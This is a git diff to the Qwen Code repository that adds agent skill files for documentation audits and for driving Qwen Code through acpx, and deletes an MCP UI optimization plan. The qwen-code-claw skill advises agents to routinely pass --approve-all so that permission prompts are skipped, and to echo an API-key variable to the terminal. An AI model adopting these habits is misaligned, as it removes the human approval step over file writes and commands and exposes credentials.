diff --git a/.github/CODEOWNERS b/.github/CODEOWNERS index 33847b6c0..32d3aebe2 100644 --- a/.github/CODEOWNERS +++ b/.github/CODEOWNERS @@ -1,6 +1,3 @@ * @tanzhenxin @DennisYu07 @gwinthis @LaZzyMan @pomelo-nwu @Mingholy @DragonnZhang # SDK TypeScript package changes require review from Mingholy packages/sdk-typescript/** @Mingholy -# vscode-ide-companion and webui packages require review from yiliang114 -packages/vscode-ide-companion/** @yiliang114 -packages/webui/** @yiliang114 diff --git a/.gitignore b/.gitignore index 115964554..493296158 100644 --- a/.gitignore +++ b/.gitignore @@ -55,9 +55,11 @@ packages/vscode-ide-companion/*.vsix # Qwen Code Configs -.qwen/ +.qwen/* !.qwen/commands/ +!.qwen/commands/** !.qwen/skills/ +!.qwen/skills/** logs/ # GHA credentials gha-creds-*.json diff --git a/.qwen/commands/qc/code-review.md b/.qwen/commands/qc/code-review.md index b5846485a..021a80d9f 100644 --- a/.qwen/commands/qc/code-review.md +++ b/.qwen/commands/qc/code-review.md @@ -14,6 +14,7 @@ You are an expert code reviewer. Follow these steps: - Any potential issues or risks Keep your review concise but thorough. Focus on: + - Code correctness - Following project conventions - Performance implications diff --git a/.qwen/commands/qc/commit.md b/.qwen/commands/qc/commit.md index 76ef6b417..fab58da2e 100644 --- a/.qwen/commands/qc/commit.md +++ b/.qwen/commands/qc/commit.md @@ -5,22 +5,26 @@ description: Commit staged changes with an AI-generated commit message and push # Commit and Push ## Overview + Generate a clear, concise commit message based on staged changes, confirm with the user, then commit and push. ## Steps ### 1. Check repository status + - Run `git status` to check: - Are there any staged changes? - Are there unstaged changes? - What is the current branch? ### 2. Handle unstaged changes + - If there are unstaged changes, notify the user and list them - Do NOT add or commit unstaged changes - Proceed only with staged changes ### 3. Review staged changes + - Run `git diff --staged` to see all staged changes - Analyze the changes in depth to understand: - What files were modified/added/deleted @@ -28,6 +32,7 @@ Generate a clear, concise commit message based on staged changes, confirm with t - The scope and impact of the changes ### 4. Handle branch logic + - Get current branch name with `git branch --show-current` - **If current branch is `main` or `master`:** - Generate a proper branch name based on the changes @@ -40,6 +45,7 @@ Generate a clear, concise commit message based on staged changes, confirm with t - Wait for user decision ### 5. Generate commit message + - Types: feat, fix, docs, style, refactor, test, chore - Guidelines: - Be clear and concise @@ -49,6 +55,7 @@ Generate a clear, concise commit message based on staged changes, confirm with t - Include a footer explaining the purpose/impact of the changes **Format:** + ``` (): - (optional) @@ -59,12 +66,14 @@ This . ``` ### 6. Present the result and confirm with user + - Present the generated commit message - Show which branch will be used - Ask for confirmation: "Proceed with commit and push?" - Wait for user approval ### 7. Commit and push + - After user confirms: - `git commit -m ""` - `git push -u origin ` (use `-u` for new branches) diff --git a/.qwen/commands/qc/create-issue.md b/.qwen/commands/qc/create-issue.md index 54317621b..020ef00d0 100644 --- a/.qwen/commands/qc/create-issue.md +++ b/.qwen/commands/qc/create-issue.md @@ -5,9 +5,11 @@ description: Draft and submit a GitHub issue based on a user-provided idea # Create Issue ## Overview + Take the user's idea or bug description, investigate the codebase to understand the full context, draft a GitHub issue for review, and submit it once approved. ## Input + The user provides a brief description of a feature request or bug report: {{args}} ## Steps diff --git a/.qwen/commands/qc/create-pr.md b/.qwen/commands/qc/create-pr.md index bf3c3c1e4..f2b491925 100644 --- a/.qwen/commands/qc/create-pr.md +++ b/.qwen/commands/qc/create-pr.md @@ -5,9 +5,11 @@ description: Create a pull request based on staged code changes # Create PR ## Overview + Create a well-structured pull request with proper description and title. ## Steps + 1. **Review staged changes** - Review all staged changes to understand what has been done - Do not touch unstaged changes @@ -31,4 +33,4 @@ Create a well-structured pull request with proper description and title. ## PR Template -@{.github/pull_request_template.md} \ No newline at end of file +@{.github/pull_request_template.md} diff --git a/.qwen/skills/docs-audit-and-refresh/SKILL.md b/.qwen/skills/docs-audit-and-refresh/SKILL.md new file mode 100644 index 000000000..f06161632 --- /dev/null +++ b/.qwen/skills/docs-audit-and-refresh/SKILL.md @@ -0,0 +1,71 @@ +--- +name: docs-audit-and-refresh +description: Audit the repository's docs/ content against the current codebase, find missing, incorrect, or stale documentation, and refresh the affected pages. Use when the user asks to review docs coverage, find outdated docs, compare docs with the current repo, or fix documentation drift across features, settings, tools, or integrations. +--- + +# Docs Audit And Refresh + +## Overview + +Audit `docs/` from the repository outward: inspect the current implementation, identify documentation gaps or inaccuracies, and update the relevant pages. Keep the work inside `docs/` and treat code, tests, and current configuration surfaces as the authoritative source. + +Read [references/audit-checklist.md](references/audit-checklist.md) before a broad audit so the scan stays focused on high-signal areas. + +## Workflow + +### 1. Build a current-state inventory + +Inspect the repository areas that define user-facing or developer-facing behavior. + +- Read the relevant code, tests, schemas, and package surfaces. +- Focus on shipped behavior, stable configuration, exposed commands, integrations, and developer workflows. +- Use the existing docs tree as a map of intended coverage, not as proof that coverage is complete. + +### 2. Compare implementation against `docs/` + +Look for three classes of issues: + +- Missing documentation for an existing feature, setting, tool, or workflow +- Incorrect documentation that contradicts the current codebase +- Stale documentation that uses old names, defaults, paths, or examples + +Prefer proving a gap with repository evidence before editing. Use current code and tests instead of intuition. + +### 3. Prioritize by reader impact + +Fix the highest-cost issues first: + +1. Broken onboarding, setup, auth, installation, or command flows +2. Wrong settings, defaults, paths, or feature behavior +3. Entirely missing documentation for a real surface area +4. Lower-impact clarity or organization improvements + +### 4. Refresh the docs + +Update the smallest correct set of pages under `docs/`. + +- Edit existing pages first +- Add new pages only for clear, durable gaps +- Update the nearest `_meta.ts` when adding or moving pages +- Keep examples executable and aligned with the current repository structure +- Remove dead or misleading text instead of layering warnings on top + +### 5. Validate the refresh + +Before finishing: + +- Search `docs/` for old terminology and replaced config keys +- Check neighboring pages for conflicting guidance +- Confirm new pages appear in the right `_meta.ts` +- Re-read critical examples, commands, and paths against code or tests + +## Audit standards + +- Favor breadth-first discovery, then depth on confirmed gaps. +- Do not rewrite large areas without evidence that they are wrong or missing. +- Keep README files out of scope for edits; limit changes to `docs/`. +- Call out residual gaps if the audit finds issues that are too large to solve in one pass. + +## Deliverable + +Produce a focused docs refresh that makes the current repository more accurate and complete. Summarize the audited surfaces and the concrete pages updated. diff --git a/.qwen/skills/docs-audit-and-refresh/references/audit-checklist.md b/.qwen/skills/docs-audit-and-refresh/references/audit-checklist.md new file mode 100644 index 000000000..54c0fb00f --- /dev/null +++ b/.qwen/skills/docs-audit-and-refresh/references/audit-checklist.md @@ -0,0 +1,41 @@ +# Audit Checklist + +Use this checklist to keep repository-wide documentation audits focused and repeatable. + +## High-signal repository surfaces + +- `packages/cli/**` + Inspect commands, flows, prompts, flags, and CLI-facing behavior. +- `packages/core/**` + Inspect shared behavior, settings, tools, provider integration, and feature semantics. +- `packages/sdk-typescript/**` and `packages/sdk-java/**` + Inspect SDK setup, usage, and examples that may affect developer docs. +- `packages/vscode-ide-companion/**`, `packages/zed-extension/**`, and related integration packages + Inspect IDE and extension behavior that should be reflected in user docs. +- `docs/**/_meta.ts` + Inspect navigation completeness after creating or moving pages. + +## Gap detection prompts + +Ask these questions while comparing the repo to `docs/`: + +- Does a visible feature exist in code but have no page or section in `docs/`? +- Does a docs page mention a command, setting, provider, or path that no longer exists? +- Do examples still match the current repository layout and command syntax? +- Is a page present but hidden or missing from `_meta.ts`? +- Do multiple pages describe the same feature inconsistently? + +## Common drift patterns + +- Renamed settings keys or changed defaults +- Updated authentication or provider configuration flow +- New or removed CLI commands and flags +- New tool behavior or approval/sandbox semantics +- IDE integration changes that never reached the docs +- Features documented in the wrong section, making them hard to find + +## Output standard + +- Prefer a small number of precise edits over a speculative docs rewrite. +- Leave a clear summary of what was missing, wrong, or stale. +- If the audit uncovers a larger docs reorganization, fix the highest-impact inaccuracies first and note the remaining work. diff --git a/.qwen/skills/docs-update-from-diff/SKILL.md b/.qwen/skills/docs-update-from-diff/SKILL.md new file mode 100644 index 000000000..1f7eb722c --- /dev/null +++ b/.qwen/skills/docs-update-from-diff/SKILL.md @@ -0,0 +1,73 @@ +--- +name: docs-update-from-diff +description: Review local code changes with git diff and update the official docs under docs/ to match. Use when the user asks to document current uncommitted work, sync docs with local changes, update docs after a feature or refactor, or when phrases like "git diff", "local changes", "update docs", or "official docs" appear. +--- + +# Docs Update From Diff + +## Overview + +Inspect local diffs, derive the documentation impact, and update only the repository's `docs/` pages. Treat the current code as the source of truth and keep changes scoped, specific, and navigable. + +Read [references/docs-surface.md](references/docs-surface.md) before editing if the affected feature does not map cleanly to an existing docs section. + +## Workflow + +### 1. Build the change set + +Start from local Git state, not from assumptions. + +- Inspect `git status --short`, `git diff --stat`, and targeted `git diff` output. +- Focus on non-doc changes first so the documentation delta is grounded in code. +- Ignore `README.md` and other non-`docs/` content unless they help confirm intent. + +### 2. Derive the docs impact + +For every changed behavior, extract the user-facing or developer-facing facts that documentation must reflect. + +- New command, flag, config key, default, workflow, or limitation +- Renamed behavior or removed behavior +- Changed examples, paths, or setup steps +- New feature that belongs in an existing page but is not mentioned yet + +Prefer updating an existing page over creating a new page. Create a new page only when the feature introduces a stable topic that would make an existing page harder to follow. + +### 3. Find the right docs location + +Map each change to the smallest correct documentation surface: + +- End-user behavior: `docs/users/**` +- Developer internals, SDKs, contributor workflow, tooling: `docs/developers/**` +- Shared landing or navigation changes: root `docs/**` and `_meta.ts` + +If you add a new page, update the nearest `_meta.ts` in the same docs section so the page is discoverable. + +### 4. Write the update + +Edit documentation with the following bar: + +- State the current behavior, not the implementation history +- Use concrete commands, file paths, setting keys, and defaults from the diff +- Remove or rewrite stale text instead of stacking caveats on top of it +- Keep examples aligned with the current CLI and repository layout +- Preserve the repository's existing docs tone and heading structure + +### 5. Cross-check before finishing + +Verify that the updated docs cover the actual delta: + +- Search `docs/` for old names, removed flags, or outdated examples +- Confirm links and relative paths still make sense +- Confirm any new page is included in the relevant `_meta.ts` +- Re-read the changed docs against the code diff, not against memory + +## Practical heuristics + +- If a change affects commands, also check quickstart, workflows, and feature pages for drift. +- If a change affects configuration, also check `docs/users/configuration/settings.md`, feature pages, and auth/provider docs. +- If a change affects tools or agent behavior, check both `docs/users/features/**` and `docs/developers/tools/**` when relevant. +- If tests reveal expected behavior more clearly than implementation code, use tests to confirm wording. + +## Deliverable + +Produce the docs edits under `docs/` that make the current local changes understandable to a reader who has not seen the diff. Keep the final summary short and identify which pages were updated. diff --git a/.qwen/skills/docs-update-from-diff/references/docs-surface.md b/.qwen/skills/docs-update-from-diff/references/docs-surface.md new file mode 100644 index 000000000..a55f0a9b4 --- /dev/null +++ b/.qwen/skills/docs-update-from-diff/references/docs-surface.md @@ -0,0 +1,39 @@ +# Docs Surface Map + +Use this file to choose the correct destination page under `docs/`. + +## Primary sections + +- `docs/users/overview.md`, `quickstart.md`, `common-workflow.md` + Good for entry points, first-run guidance, and broad user workflows. +- `docs/users/features/*.md` + Good for user-visible features such as skills, MCP, sandbox, sub-agents, commands, checkpointing, and approval modes. +- `docs/users/configuration/*.md` + Good for settings, auth, model providers, themes, trusted folders, `.qwen` files, and similar configuration topics. +- `docs/users/integration-*.md` and `docs/users/ide-integration/*.md` + Good for IDEs, GitHub Actions, and editor companion behavior. +- `docs/users/extension/*.md` + Good for extension authoring and extension usage. +- `docs/developers/*.md` + Good for architecture, contributing workflow, roadmaps, and SDK overviews. +- `docs/developers/tools/*.md` + Good for tool behavior, tool contracts, and implementation-facing explanations. +- `docs/developers/development/*.md` + Good for contributor setup, deployment, tests, telemetry, and automation details. + +## Navigation rules + +- Root navigation lives in `docs/_meta.ts`. +- Section navigation lives in the nearest `_meta.ts`, for example: + - `docs/users/_meta.ts` + - `docs/users/features/_meta.ts` + - `docs/developers/_meta.ts` + - `docs/developers/tools/_meta.ts` +- If you create a page and do not add it to the right `_meta.ts`, the docs will be incomplete even if the markdown exists. + +## Placement heuristics + +- Put the change where a reader would naturally look first. +- Update multiple pages when a single feature appears in setup, reference, and workflow docs. +- Prefer adjusting a nearby existing page instead of creating a top-level page for a small delta. +- Avoid duplicating long explanations across pages; add one source page and update nearby pages with short pointers if needed. diff --git a/.qwen/skills/qwen-code-claw/SKILL.md b/.qwen/skills/qwen-code-claw/SKILL.md new file mode 100644 index 000000000..f9a7b6a17 --- /dev/null +++ b/.qwen/skills/qwen-code-claw/SKILL.md @@ -0,0 +1,201 @@ +--- +name: qwen-code-claw +description: Use Qwen Code as a Code Agent for code understanding, project generation, features, bug fixes, refactoring, and various programming tasks +--- + +# Qwen Code Claw + +## When to Use This Skill + +Use this skill when you need to: + +- Understand codebases or ask questions about source code +- Generate new projects or add new features +- Review pull requests in the codebase +- Fix bugs or refactor existing code +- Execute various programming tasks such as code review, testing, documentation generation, etc. +- Collaborate with other tools and agents to complete complex development tasks + +## Install + +```bash +npm install -g @qwen-code/qwen-code +``` + +For normal session reuse, prefer a global install over `npx`. + +## Authentication + +Check if authentication is already configured: + +```bash +qwen auth status +``` + +If authentication exists, skip this section. If not authenticated, check if the `BAILIAN_CODING_PLAN_API_KEY` environment variable exists: + +```bash +echo $BAILIAN_CODING_PLAN_API_KEY +``` + +**If `BAILIAN_CODING_PLAN_API_KEY` exists**, authenticate directly: + +```bash +qwen auth coding-plan --region china --key $BAILIAN_CODING_PLAN_API_KEY +``` + +**If the environment variable does not exist**, interrupt and prompt the user to authenticate via `qwen-oauth` or `coding-plan`: + +```bash +qwen auth +``` + +Or configure custom API after launching Qwen Code via `/auth`. + +## ACPX Integration + +You should always use `acpx` to run Qwen Code over the Agent Client Protocol (ACP) instead of scraping PTY sessions. + +To use acpx: + +1. **Install acpx globally** (recommended) or use npx: + + ```bash + npm install -g acpx@latest + ``` + + Or without installing: + + ```bash + npx acpx@latest + ``` + +2. **Install the acpx skill** for full reference: + + ```bash + npx acpx@latest --skill install acpx + ``` + +3. **Read the acpx skill reference** for every command, flag, and workflow pattern: + See the [ACPX Reference](#acpx-reference) section below for details + +4. **For complete CLI reference with all options and examples**: + https://raw.githubusercontent.com/openclaw/acpx/main/docs/CLI.md + +From now on, when you need to delegate work to Qwen Code, use `acpx` instead of spawning raw terminal sessions. For example: + +```bash +npx acpx@latest qwen "fix the failing tests" +npx acpx@latest qwen "refactor the auth module" +npx acpx@latest qwen exec "one-shot: summarize this repo" +``` + +> **Tip:** You should typically use the `--approve-all` flag to prevent task interruptions. + +## Practical Workflows + +### Persistent Repository Assistant + +```bash +acpx qwen 'inspect failing tests and propose a fix plan' +acpx qwen 'apply the smallest safe fix and run tests' +``` + +### One-Shot Script Steps + +```bash +acpx qwen exec 'summarize repo purpose in 3 lines' +``` + +### Parallel Named Streams + +```bash +acpx qwen -s backend 'fix API pagination bug' +acpx qwen -s docs 'draft changelog entry for release' +``` + +### Queue Follow-ups Without Waiting + +```bash +acpx qwen 'run full test suite and investigate failures' +acpx qwen --no-wait 'after tests, summarize root causes and next steps' +``` + +### Machine-Readable Output for Orchestration + +```bash +acpx --format json qwen 'review current branch changes' > events.ndjson +``` + +### Repository-Wide Review with Permissive Mode + +```bash +acpx --cwd ~/repos/my-project --approve-all qwen -s pr-123 \ + 'review PR #123 for regressions and propose minimal patch' +``` + +## Approval Modes + +- `--approve-all`: No interactive prompts +- `--approve-reads` (default): Auto-approve reads/searches, prompt for writes +- `--deny-all`: Deny all permission requests + +If every permission request is denied/cancelled and none are approved, `acpx` exits with permission denied. + +## Best Practices + +1. Use **named sessions** for organizing different types of development tasks +2. Use `--no-wait` for long-running tasks to avoid blocking +3. Use `--approve-all` for non-interactive batch operations +4. Use `--format json` for automation and script integration +5. Use `--cwd` to manage context across multiple projects + +## ACPX Reference + +### Built-in Agent Registry + +Well-known agent names resolve to commands: + +- `qwen` → `qwen --acp` + +### Command Syntax + +```bash +# Default (prompt mode, persistent session) +acpx [global options] [prompt text...] +acpx [global options] prompt [options] [prompt text...] + +# One-shot execution +acpx [global options] exec [options] [prompt text...] + +# Session management +acpx [global options] cancel [-s ] +acpx [global options] set-mode [-s ] +acpx [global options] set [-s ] +acpx [global options] status [-s ] +acpx [global options] sessions [list | new [--name ] | close [name] | show [name] | history [name] [--limit ]] +acpx [global options] config [show | init] + +# With explicit agent +acpx [global options] [options] [prompt text...] +acpx [global options] prompt [options] [prompt text...] +acpx [global options] exec [options] [prompt text...] +``` + +> **Note:** If prompt text is omitted and stdin is piped, `acpx` reads prompt from stdin. + +### Global Options + +| Option | Description | +| --------------------- | ------------------------------------------------------------ | +| `--agent ` | Raw ACP agent command (fallback mechanism) | +| `--cwd ` | Session working directory | +| `--approve-all` | Auto-approve all requests | +| `--approve-reads` | Auto-approve reads/searches, prompt for writes (default) | +| `--deny-all` | Deny all requests | +| `--format ` | Output format: `text`, `json`, `quiet` | +| `--timeout ` | Maximum wait time (positive integer) | +| `--ttl ` | Idle TTL for queue owners (default: `300`, `0` disables TTL) | +| `--verbose` | Verbose ACP/debug logs to stderr | + +Flags are mutually exclusive where applicable. diff --git a/.qwen/skills/terminal-capture/SKILL.md b/.qwen/skills/terminal-capture/SKILL.md index 7fc99a18d..043f49542 100644 --- a/.qwen/skills/terminal-capture/SKILL.md +++ b/.qwen/skills/terminal-capture/SKILL.md @@ -211,31 +211,31 @@ This tool is commonly used for visual verification during PR reviews. For the co ```typescript interface FlowStep { - type?: string; // Input text - key?: string | string[]; // Key press(es) - capture?: string; // Viewport screenshot filename - captureFull?: string; // Full scrollback screenshot filename + type?: string; // Input text + key?: string | string[]; // Key press(es) + capture?: string; // Viewport screenshot filename + captureFull?: string; // Full scrollback screenshot filename streaming?: { - delayMs?: number; // Delay before first capture (default: 0) - intervalMs: number; // Interval between captures in ms - count: number; // Maximum number of captures - gif?: boolean; // Generate animated GIF (default: true) + delayMs?: number; // Delay before first capture (default: 0) + intervalMs: number; // Interval between captures in ms + count: number; // Maximum number of captures + gif?: boolean; // Generate animated GIF (default: true) }; } interface ScenarioConfig { - name: string; // Scenario name (also used as screenshot subdirectory name) - spawn: string[]; // Launch command ["node", "dist/cli.js", "--yolo"] - flow: FlowStep[]; // Interaction steps + name: string; // Scenario name (also used as screenshot subdirectory name) + spawn: string[]; // Launch command ["node", "dist/cli.js", "--yolo"] + flow: FlowStep[]; // Interaction steps terminal?: { - cols?: number; // Number of columns, default 100 - rows?: number; // Number of rows, default 28 - theme?: string; // Theme: dracula|one-dark|github-dark|monokai|night-owl - chrome?: boolean; // macOS window decorations, default true - title?: string; // Window title, default "Terminal" - fontSize?: number; // Font size - cwd?: string; // Working directory (relative to config file) + cols?: number; // Number of columns, default 100 + rows?: number; // Number of rows, default 28 + theme?: string; // Theme: dracula|one-dark|github-dark|monokai|night-owl + chrome?: boolean; // macOS window decorations, default true + title?: string; // Window title, default "Terminal" + fontSize?: number; // Font size + cwd?: string; // Working directory (relative to config file) }; - outputDir?: string; // Screenshot output directory (relative to config file) + outputDir?: string; // Screenshot output directory (relative to config file) } ``` diff --git a/OPTIMIZATION_PLAN.md b/OPTIMIZATION_PLAN.md deleted file mode 100644 index b56e14ea9..000000000 --- a/OPTIMIZATION_PLAN.md +++ /dev/null @@ -1,962 +0,0 @@ -# Qwen Code 0.12.0 MCP & Extension Management 优化方案 - -## 问题梳理与解决方案 - -根据钉钉文档《0.12.0 体验反馈》中提出的问题,本文件详细分析了每个问题的根本原因,并提供具体的解决方案和代码修改建议。 - ---- - -## 文档问题概览 - -本文档共包含 **6 个问题** (3 个 P1 + 3 个 P2),分为两个主要部分: - -### Part 1: MCP Management TUI (5 个问题) - -- **P1 级别**: 3 个问题 -- **P2 级别**: 2 个细节问题 (共 10 个小点) - -### Part 2: Extension Management TUI (1 个问题) - -- **P2 级别**: 1 个命令报错问题 - -## 问题 1: 【P1】Auth 属于 manage 的一部分,应该加到 manage 里 - -### 问题描述 - -- **现状**: 当前 MCP Management Dialog 中**没有 OAuth 认证功能**,用户必须使用 `/mcp auth ` 命令进行认证 -- **问题**: - - Auth 功能独立于 Manage Dialog 之外,用户体验割裂 - - 需要记住命令行才能认证,不够直观 - - MCP 管理对话框中只能查看服务器状态和工具,无法进行认证操作 -- **文档建议**: Auth 应该整合到 manage dialog 中,在 UI 界面内完成所有 MCP 管理操作 - -### 根本原因分析 - -#### 当前实现 - -```typescript -// packages/cli/src/ui/commands/mcpCommand.ts -const mcpCommand: SlashCommand = { - name: 'mcp', - subCommands: [manageCommand, authCommand], // auth 作为独立子命令存在 - action: async (): Promise => ({ - type: 'dialog', - dialog: 'mcp', // 默认打开管理对话框 - }), -}; -``` - -#### MCP Management Dialog 现状 - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -// 当前的步骤类型 -export const MCP_MANAGEMENT_STEPS = { - SERVER_LIST: 'server-list', - SERVER_DETAIL: 'server-detail', - DISABLE_SCOPE_SELECT: 'disable-scope-select', - TOOL_LIST: 'tool-list', - TOOL_DETAIL: 'tool-detail', -} as const; - -// ServerDetailStep 中的操作选项 -const actions = [ - { label: 'View tools', value: 'view-tools' }, - { label: 'Reconnect', value: 'reconnect' }, - { label: 'Enable/Disable', value: 'toggle-disable' }, - // ❌ 缺少 'Authenticate' 选项 -]; -``` - -#### 问题分析 - -1. **UI 层面**: MCP Management Dialog 中没有认证相关的 UI 组件和操作入口 -2. **代码层面**: OAuth 认证逻辑只在命令行 handler 中实现 (`mcpCommand.ts` 的 `authCommand`) -3. **体验层面**: 用户需要在 TUI 和 CLI 之间切换,无法在一个界面内完成所有操作 - -### 解决方案 - -#### 方案 A: 在 MCP Dialog 中集成完整的 OAuth 认证功能 (强烈推荐) - -**核心思路**: - -- 在 Server Detail 页面添加 "Authenticate" 操作选项 -- 复用现有的 `MCPOAuthProvider` 和 OAuth 流程 -- 通过事件系统显示认证过程中的提示信息 - -**实现步骤**: - -##### 1. 扩展 MCP_MANAGEMENT_STEPS - -```typescript -// packages/cli/src/ui/components/mcp/types.ts -export const MCP_MANAGEMENT_STEPS = { - SERVER_LIST: 'server-list', - SERVER_DETAIL: 'server-detail', - DISABLE_SCOPE_SELECT: 'disable-scope-select', - TOOL_LIST: 'tool-list', - TOOL_DETAIL: 'tool-detail', - AUTHENTICATE: 'authenticate', // 新增:认证步骤 -} as const; -``` - -##### 2. 在 ServerDetailStep 中添加认证选项 - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -type ServerAction = - | 'view-tools' - | 'reconnect' - | 'toggle-disable' - | 'authenticate'; // 新增 - -const actions = useMemo(() => { - const result: Array<{ label: string; value: ServerAction }> = []; - - result.push({ label: t('View Tools'), value: 'view-tools' }); - - if (!server.isDisabled && server.status === MCPServerStatus.DISCONNECTED) { - result.push({ label: t('Reconnect'), value: 'reconnect' }); - } - - // 新增:显示认证选项的场景 - const needsAuth = - server.config.oauth?.enabled || - server.status === MCPServerStatus.DISCONNECTED || - server.errorMessage?.includes('401') || - server.errorMessage?.includes('OAuth'); - - if (needsAuth) { - result.push({ - label: t('Authenticate'), - value: 'authenticate', - icon: '🔐', // 可选:添加图标增强视觉提示 - }); - } - - result.push({ - label: server.isDisabled ? t('Enable') : t('Disable'), - value: 'toggle-disable', - }); - - return result; -}, [server]); -``` - -##### 3. 在 MCPManagementDialog 中实现认证逻辑 - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -import { MCPOAuthProvider, MCPOAuthConfig } from '@qwen-code/qwen-code-core'; -import { appEvents, AppEvent } from '../../utils/events.js'; - -// 新增:处理认证 -const handleAuthenticate = useCallback(async () => { - if (!config || !selectedServer) return; - - try { - setIsLoading(true); - - // 显示开始认证提示 - context.ui.addItem( - { - type: 'info', - text: t("Starting OAuth authentication for '{{name}}'...", { - name: selectedServer.name, - }), - }, - Date.now() - ); - - // 监听并显示认证过程中的消息 - const displayListener = (message: string) => { - context.ui.addItem({ type: 'info', text: message }, Date.now()); - }; - appEvents.on(AppEvent.OauthDisplayMessage, displayListener); - - // 准备 OAuth 配置 - let oauthConfig: MCPOAuthConfig = selectedServer.config.oauth || { enabled: false }; - - // 执行认证 - const authProvider = new MCPOAuthProvider(new MCPOAuthTokenStorage()); - await authProvider.authenticate( - selectedServer.name, - oauthConfig, - selectedServer.config.httpUrl || selectedServer.config.url - ); - - // 认证成功 - context.ui.addItem( - { - type: 'success', - text: t("✓ Authentication successful for '{{name}}'", { - name: selectedServer.name, - }), - }, - Date.now() - ); - - // 移除消息监听器 - appEvents.off(AppEvent.OauthDisplayMessage, displayListener); - - // 重新加载服务器数据以更新状态 - await reloadServers(); - - // 返回上一级 - handleNavigateBack(); - } catch (error) { - debugLogger.error( - `Authentication failed for '${selectedServer.name}':`, - error - ); - context.ui.addItem( - { - type: 'error', - text: t("✗ Authentication failed: {{error}}", { - error: getErrorMessage(error), - }), - }, - Date.now() - ); - } finally { - setIsLoading(false); - } -}, [config, selectedServer, reloadServers, handleNavigateBack, context]); - -// 在 renderStepContent 中添加认证步骤的处理 -case MCP_MANAGEMENT_STEPS.AUTHENTICATE: - // 可以直接执行认证,或者显示一个确认对话框 - void handleAuthenticate(); - return {t('Authenticating...')}; -``` - -##### 4. 更新 i18n 翻译文件 - -```javascript -// packages/cli/src/i18n/locales/en.js -{ - 'Authenticate': 'Authenticate', - 'Authenticate with OAuth': 'Authenticate with OAuth', - "Starting OAuth authentication for '{{name}}'...": "Starting OAuth authentication for '{{name}}'...", - "✓ Authentication successful for '{{name}}'": "✓ Authentication successful for '{{name}}'", - "✗ Authentication failed: {{error}}": "✗ Authentication failed: {{error}}", -} -``` - -**优点**: - -- ✅ 用户体验统一,所有 MCP 管理操作在一个界面完成 -- ✅ 复用现有 OAuth 认证逻辑,开发成本低 -- ✅ 直观的视觉反馈,认证过程透明 -- ✅ 符合现代 UI/UX 设计原则 - -**缺点**: - -- ⚠️ 需要处理浏览器跳转和回调 (已有完善实现,风险低) - -#### 方案 B: 保留命令行但改进引导提示 - -如果某些场景下确实需要命令行认证 (如自动化脚本),可以: - -- 保留 `/mcp auth` 命令 -- 在 Dialog 中提供快速复制的命令模板 -- 添加"Copy Auth Command"按钮 - -但这会增加复杂性,不如方案 A 简洁。 - ---- - -## 问题 2: 【P1】一些异常状态 - -### 2.1 禁用之后还可以点击"查看工具",点进去是空的 - -#### 问题描述 - -- **现象**: MCP Server 被禁用后,仍然可以在 UI 中看到"查看工具"选项,点击进入后显示空列表 -- **期望**: 禁用后的服务器不应该显示"查看工具"选项,或者应该给出明确的提示信息 - -#### 根本原因分析 - -当前代码逻辑: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -const actions = useMemo(() => { - const result: Array<{ label: string; value: ServerAction }> = []; - - // 无论服务器是否禁用,都添加"查看工具"选项 - result.push({ label: t('View Tools'), value: 'view-tools' }); - - if (server.status === 'disconnected') { - result.push({ label: t('Reconnect'), value: 'reconnect' }); - } - - result.push({ - label: server.isDisabled ? t('Enable') : t('Disable'), - value: 'toggle-disable', - }); - - return result; -}, [server]); -``` - -问题在于: - -1. 没有根据 `server.isDisabled` 状态过滤操作选项 -2. 禁用服务器的工具列表获取逻辑可能存在问题 -3. 缺少用户友好的提示信息 - -#### 解决方案 - -**方案 A: 禁用时隐藏"查看工具"选项 (推荐)** - -**代码修改**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -const actions = useMemo(() => { - const result: Array<{ label: string; value: ServerAction }> = []; - - // 只在服务器启用且已连接时显示"查看工具"选项 - if (!server.isDisabled && server.status === MCPServerStatus.CONNECTED) { - result.push({ - label: t('View Tools'), - value: 'view-tools', - disabled: server.toolCount === 0, // 可选:工具数量为 0 时禁用 - }); - } - - // 禁用状态下显示提示信息 - if (server.isDisabled) { - result.push({ - label: t('Enable to view tools'), - value: 'toggle-disable', - }); - } else { - if (server.status === MCPServerStatus.DISCONNECTED) { - result.push({ label: t('Reconnect'), value: 'reconnect' }); - } - - result.push({ - label: t('Disable'), - value: 'toggle-disable', - }); - } - - return result; -}, [server]); -``` - -**同时修改 ToolListStep**: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ToolListStep.tsx -export const ToolListStep: React.FC = ({ - tools, - serverName, - onSelect, - onBack, -}) => { - // 添加禁用状态检查 - if (tools.length === 0) { - return ( - - - {t('No tools available for this server.')} - - {/* 添加提示:服务器可能被禁用 */} - - {t('Note: This server may be disabled. Please enable it in the server settings.')} - - - ); - } - // ... 其余代码保持不变 -}; -``` - -**方案 B: 显示友好提示并阻止导航** - -在 `MCPManagementDialog` 中添加拦截逻辑: - -```typescript -// packages/cli/src/ui/components/mcp/MCPManagementDialog.tsx -const handleViewTools = useCallback(() => { - if (!selectedServer) return; - - // 检查服务器是否禁用 - if (selectedServer.isDisabled) { - // 显示提示信息,不执行导航 - debugLogger.warn( - `Cannot view tools for disabled server '${selectedServer.name}'`, - ); - // 可选:在 UI 上显示临时消息 - return; - } - - // 检查是否有工具 - if (selectedServer.toolCount === 0) { - debugLogger.info(`No tools available for server '${selectedServer.name}'`); - // 仍然可以进入查看,但会显示空状态提示 - } - - handleNavigateToStep(MCP_MANAGEMENT_STEPS.TOOL_LIST); -}, [selectedServer, handleNavigateToStep]); -``` - -#### 推荐方案:方案 A + ToolListStep 的提示增强 - ---- - -### 2.2 禁用之后还能重新连接 - -#### 问题描述 - -- **现象**: MCP Server 被禁用后,仍然可以看到"重新连接"选项 -- **期望**: 禁用之后应该没有"重新连接"入口 -- **文档建议**: 禁用之后应该没有"重新连接"入口 - -#### 根本原因分析 - -当前代码逻辑: - -```typescript -// packages/cli/src/ui/components/mcp/steps/ServerDetailStep.tsx -if (server.status === 'disconnected') { - result.push({ label: t('Reconnect'), value: 'reconnect' }); -} -``` - -问题在于: - -1. 只检查了连接状态,没有检查禁用状态 -2. 禁用的服务器不应该允许重新连接操作 -3. 逻辑上矛盾:既然禁用了就不应该尝试连接 - -#### 解决方案 - 